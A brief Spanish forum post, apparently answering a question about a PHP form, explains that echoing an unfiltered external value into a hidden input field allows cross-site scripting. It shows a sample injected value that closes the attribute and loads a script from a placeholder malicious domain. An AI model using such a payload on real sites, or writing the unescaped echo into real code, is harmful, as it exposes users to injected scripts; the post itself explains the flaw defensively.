De tener algun bug, sera en el codigo que recibe ese formulario. O como mucho en
Código PHP:
<input name="id_so" type="hidden" id="id_so" value="<?php echo $id_so; ?>">
si $id_so es un valor que recibe la pagina de forma externa (GET, POST, COOKIE) y no es filtrada para evitar que pueda tener valores como 30"><script src="http://dominiodelosmalos/script_malo"></script